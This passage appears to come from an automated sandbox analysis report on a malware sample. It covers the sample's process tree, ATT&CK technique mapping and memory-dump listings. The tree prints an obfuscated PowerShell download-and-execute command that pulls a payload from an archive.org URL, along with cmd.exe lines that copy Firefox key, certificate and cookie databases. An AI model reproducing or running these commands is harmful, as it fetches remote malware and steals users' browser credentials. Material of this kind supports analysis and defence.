- Process spawned unexpected child process
PID:5476

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8100

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7364

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601409XXXusXXXarchiveXXXorg/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435XXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
1⤵
PID:6432
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:11388
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\profiles.ini C:\Users\Admin\AppData\Local\Temp\260201312.tmp"
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\key4.db C:\Users\Admin\AppData\Local\Temp\260248421.tmp"
    3⤵
    PID:17788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\cert9.db C:\Users\Admin\AppData\Local\Temp\260297000.tmp"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\prefs.js C:\Users\Admin\AppData\Local\Temp\260349171.tmp"
    3⤵
    PID:14912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/tqq24hzz.default-release\cookies.sqlite C:\Users\Admin\AppData\Local\Temp\260409875.tmp"
    3⤵
    PID:19448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Local\Temp\260409875.tmp C:\Users\Admin\AppData\Local\Temp\260493312.tmp"
    3⤵
    PID:19884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\profiles.ini C:\Users\Admin\AppData\Local\Temp\260552796.tmp"
    3⤵
    PID:8928
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\key4.db C:\Users\Admin\AppData\Local\Temp\260622093.tmp"
    3⤵
    PID:21636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\cert9.db C:\Users\Admin\AppData\Local\Temp\260693968.tmp"
    3⤵
    PID:22492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/tqq24hzz.default-release\prefs.js C:\Users\Admin\AppData\Local\Temp\260768406.tmp"
    3⤵
    PID:23532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/tqq24hzz.default-release\cookies.sqlite C:\Users\Admin\AppData\Local\Temp\260811125.tmp"
    3⤵
    PID:1840

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5600

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5416

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6780

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6384

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7024

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5820

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6840

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6944

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8600

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8940

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8520

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:2212

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:2372

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:1040

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8984

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6140

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5260

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:3244

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4428

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4968

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
- Executes dropped EXE
PID:4160

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:4480

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9492

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9768

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:5740

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:10040

C:\Users\Admin\AppData\Roaming\6843103.exe
"C:\Users\Admin\AppData\Roaming\6843103.exe"
1⤵
PID:5540

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\7h2PpcAg.com
"C:\Users\Admin\AppData\Local\Temp\7h2PpcAg.com"
1⤵
PID:5364

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:2368

C:\Users\Admin\AppData\Roaming\1041065.exe
"C:\Users\Admin\AppData\Roaming\1041065.exe"
1⤵
PID:5204

C:\Users\Admin\AppData\Roaming\8901286.exe
"C:\Users\Admin\AppData\Roaming\8901286.exe"
1⤵
PID:5152

C:\Users\Admin\AppData\Roaming\7200030.exe
"C:\Users\Admin\AppData\Roaming\7200030.exe"
1⤵
PID:2692

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:6040

C:\Users\Admin\AppData\Roaming\3073459.exe
"C:\Users\Admin\AppData\Roaming\3073459.exe"
1⤵
PID:4408

C:\Users\Admin\AppData\Roaming\8194066.exe
"C:\Users\Admin\AppData\Roaming\8194066.exe"
1⤵
PID:4340

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9660

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:3856

C:\Users\Admin\AppData\Roaming\5297836.exe
"C:\Users\Admin\AppData\Roaming\5297836.exe"
1⤵
PID:964

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:68

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9708

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:8300

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9248

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:7448

C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
C:\Users\Admin\Documents\xYWZ79E_cUaCc2gsSdAXmjDK.exe
1⤵
PID:9004

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff798daa890,0x7ff798daa8a0,0x7ff798daa8b0
1⤵
PID:11852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/416-263-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/416-294-0x0000000005480000-0x0000000005A86000-memory.dmp

Filesize
6.0MB

Download
memory/492-252-0x0000000009D80000-0x0000000009D96000-memory.dmp

Filesize
88KB

Download
memory/492-213-0x00000000079C0000-0x00000000079C1000-memory.dmp

Filesize
4KB

Download
memory/492-228-0x00000000078B0000-0x00000000078B1000-memory.dmp

Filesize
4KB

Download
memory/492-165-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/492-201-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

Filesize
4KB

Download
memory/492-242-0x0000000007A60000-0x0000000007A61000-memory.dmp

Filesize
4KB

Download
memory/492-255-0x0000000009E40000-0x0000000009E41000-memory.dmp

Filesize
4KB

Download
memory/768-218-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download
memory/768-189-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/768-243-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/788-322-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/788-307-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download
memory/788-376-0x0000000004ED4000-0x0000000004ED6000-memory.dmp

Filesize
8KB

Download
memory/788-318-0x0000000004ED3000-0x0000000004ED4000-memory.dmp

Filesize
4KB

Download
memory/788-312-0x0000000004ED2000-0x0000000004ED3000-memory.dmp

Filesize
4KB

Download
memory/788-287-0x00000000008E0000-0x000000000096E000-memory.dmp

Filesize
568KB

Download
memory/800-114-0x0000000003760000-0x000000000389F000-memory.dmp

Filesize
1.2MB

Download
memory/1160-264-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1160-301-0x00000000050E0000-0x00000000056E6000-memory.dmp

Filesize
6.0MB

Download
memory/1560-275-0x00000000007F0000-0x00000000008C3000-memory.dmp

Filesize
844KB

Download
memory/1560-278-0x0000000000400000-0x0000000000593000-memory.dmp

Filesize
1.6MB

Download
memory/1632-196-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/1632-202-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/1632-221-0x0000000005250000-0x0000000005856000-memory.dmp

Filesize
6.0MB

Download
memory/1632-236-0x00000000053B0000-0x00000000053B1000-memory.dmp

Filesize
4KB

Download
memory/1632-163-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

Filesize
4KB

Download
memory/1632-224-0x0000000005370000-0x0000000005371000-memory.dmp

Filesize
4KB

Download
memory/1632-183-0x0000000005860000-0x0000000005861000-memory.dmp

Filesize
4KB

Download
memory/1736-421-0x0000000005070000-0x0000000005676000-memory.dmp

Filesize
6.0MB

Download
memory/2240-616-0x00000000001C0000-0x00000000001F0000-memory.dmp

Filesize
192KB

Download
memory/2240-648-0x0000000006760000-0x0000000006761000-memory.dmp

Filesize
4KB

Download
memory/2240-635-0x0000000000400000-0x0000000002182000-memory.dmp

Filesize
29.5MB

Download
memory/2244-238-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/2244-227-0x0000000076EA0000-0x000000007702E000-memory.dmp

Filesize
1.6MB

Download
memory/2244-254-0x0000000003810000-0x0000000003811000-memory.dmp

Filesize
4KB

Download
memory/2468-505-0x000000001B180000-0x000000001B182000-memory.dmp

Filesize
8KB

Download
memory/2532-341-0x00000000051B0000-0x00000000057B6000-memory.dmp

Filesize
6.0MB

Download
memory/2648-392-0x00000000055D0000-0x0000000005BD6000-memory.dmp

Filesize
6.0MB

Download
memory/2676-614-0x0000000004D40000-0x0000000005346000-memory.dmp

Filesize
6.0MB

Download
memory/2692-554-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/2896-231-0x0000000002F40000-0x0000000002F41000-memory.dmp

Filesize
4KB

Download
memory/2896-190-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

Filesize
4KB

Download
memory/2896-233-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/3096-625-0x0000000005710000-0x0000000005D16000-memory.dmp

Filesize
6.0MB

Download
memory/3132-229-0x0000000076EA0000-0x000000007702E000-memory.dmp

Filesize
1.6MB

Download
memory/3132-244-0x0000000000960000-0x0000000000961000-memory.dmp

Filesize
4KB

Download
memory/3132-256-0x00000000052E0000-0x00000000052E1000-memory.dmp

Filesize
4KB

Download
memory/3748-639-0x0000000000400000-0x00000000021AE000-memory.dmp

Filesize
29.7MB

Download
memory/3748-605-0x00000000023A0000-0x000000000242F000-memory.dmp

Filesize
572KB

Download
memory/4232-239-0x000000001AD80000-0x000000001AD82000-memory.dmp

Filesize
8KB

Download
memory/4232-225-0x0000000000720000-0x0000000000738000-memory.dmp

Filesize
96KB

Download
memory/4232-198-0x0000000000010000-0x0000000000011000-memory.dmp

Filesize
4KB

Download
memory/4248-413-0x0000000005390000-0x0000000005996000-memory.dmp

Filesize
6.0MB

Download
memory/4276-219-0x00000000006F0000-0x00000000006F1000-memory.dmp

Filesize
4KB

Download
memory/4276-237-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/4328-234-0x000000001BCD0000-0x000000001BCD2000-memory.dmp

Filesize
8KB

Download
memory/4328-223-0x0000000001330000-0x0000000001346000-memory.dmp

Filesize
88KB

Download
memory/4328-195-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

Filesize
4KB

Download
memory/4340-512-0x000000001BB70000-0x000000001BB72000-memory.dmp

Filesize
8KB

Download
memory/4368-336-0x0000000005040000-0x0000000005646000-memory.dmp

Filesize
6.0MB

Download
memory/4368-282-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4408-481-0x0000000004F20000-0x0000000004F21000-memory.dmp

Filesize
4KB

Download
memory/4428-598-0x0000000004D40000-0x0000000005346000-memory.dmp

Filesize
6.0MB

Download
memory/4480-525-0x0000000005460000-0x0000000005A66000-memory.dmp

Filesize
6.0MB

Download
memory/4528-603-0x0000000005600000-0x0000000005C06000-memory.dmp

Filesize
6.0MB

Download
memory/4540-211-0x0000000000A70000-0x0000000000BBA000-memory.dmp

Filesize
1.3MB

Download
memory/4540-208-0x0000000000A10000-0x0000000000A20000-memory.dmp

Filesize
64KB

Download
memory/4636-217-0x0000000000030000-0x0000000000033000-memory.dmp

Filesize
12KB

Download
memory/4688-347-0x0000000004CA0000-0x00000000052A6000-memory.dmp

Filesize
6.0MB

Download
memory/4860-533-0x0000000000C30000-0x0000000000D7A000-memory.dmp

Filesize
1.3MB

Download
memory/4888-464-0x0000000003610000-0x000000000374F000-memory.dmp

Filesize
1.2MB

Download
memory/4932-548-0x0000000005050000-0x0000000005656000-memory.dmp

Filesize
6.0MB

Download
memory/5036-397-0x0000000005770000-0x0000000005D76000-memory.dmp

Filesize
6.0MB

Download
memory/5152-541-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/5164-475-0x0000000004DA0000-0x00000000053A6000-memory.dmp

Filesize
6.0MB

Download
memory/5204-469-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/5276-470-0x00000000056C0000-0x0000000005CC6000-memory.dmp

Filesize
6.0MB

Download
memory/5312-453-0x0000000002BC0000-0x0000000002BC1000-memory.dmp

Filesize
4KB

Download
memory/5456-561-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/5488-527-0x0000000005160000-0x0000000005766000-memory.dmp

Filesize
6.0MB

Download
memory/5492-538-0x0000000005760000-0x0000000005D66000-memory.dmp

Filesize
6.0MB

Download
memory/5540-461-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/5740-486-0x0000000004F70000-0x0000000005576000-memory.dmp

Filesize
6.0MB

Download
memory/5836-498-0x00000000052C0000-0x00000000058C6000-memory.dmp

Filesize
6.0MB

Download
memory/5896-557-0x0000000005740000-0x0000000005D46000-memory.dmp

Filesize
6.0MB

Download
memory/6008-579-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/6072-608-0x0000000004CC0000-0x00000000052C6000-memory.dmp

Filesize
6.0MB

Download
memory/6216-643-0x00000000048C9000-0x00000000049CA000-memory.dmp

Filesize
1.0MB

Download